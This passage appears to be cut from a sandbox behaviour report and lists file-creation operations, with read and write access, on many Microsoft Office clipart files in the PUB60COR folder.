| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD00116_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD00141_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD00146_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD00155_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD00160_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD00173_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD05119_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD06102_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD06200_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD07761_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD07804_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD07831_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD08758_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD08773_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD08808_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD08868_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD09031_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD09194_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD09662_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD09664_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD10890_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD10972_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19563_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19582_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19695_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19827_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19828_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19986_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD19988_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BD20013_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00008_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00012_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00045_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00098_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00105_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00122_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00130_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00148_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00152_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00194_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00195_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00234_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00242_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00247_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00248_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00252_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00254_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00261_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00262_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00265_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00267_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00269_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00270_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00273_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00274_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00296_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00390_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00392_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00524_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00525_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00526_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00648_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00921_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00923_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00932_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BL00985_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BOAT.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BOATINST.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00076_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00078_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00092_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00100_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00135_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00136_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00145_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00174_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00184_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00186_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00200_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00224_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00438_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00439_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00440_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00441_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00442_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00443_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00444_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00445_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS00453_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01080_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01603_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01634_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01635_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01636_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01637_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01638_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BS01639_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CARBN_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CG1606.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CLASSIC1.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CLASSIC2.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CLIP.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CMNTY_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CRANE.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CRANINST.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CUP.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\CUPINST.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00117_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00121_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00234_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00255_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00256_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00261_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00297_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00372_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00405_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00407_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00413_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00414_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00419_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00437_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00448_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00449_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00687_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD00705_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01015_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01039_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01138_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01139_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01140_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01143_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01145_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01146_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01151_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01152_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01157_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01160_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01162_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01163_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01166_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01167_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01168_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01169_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01170_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
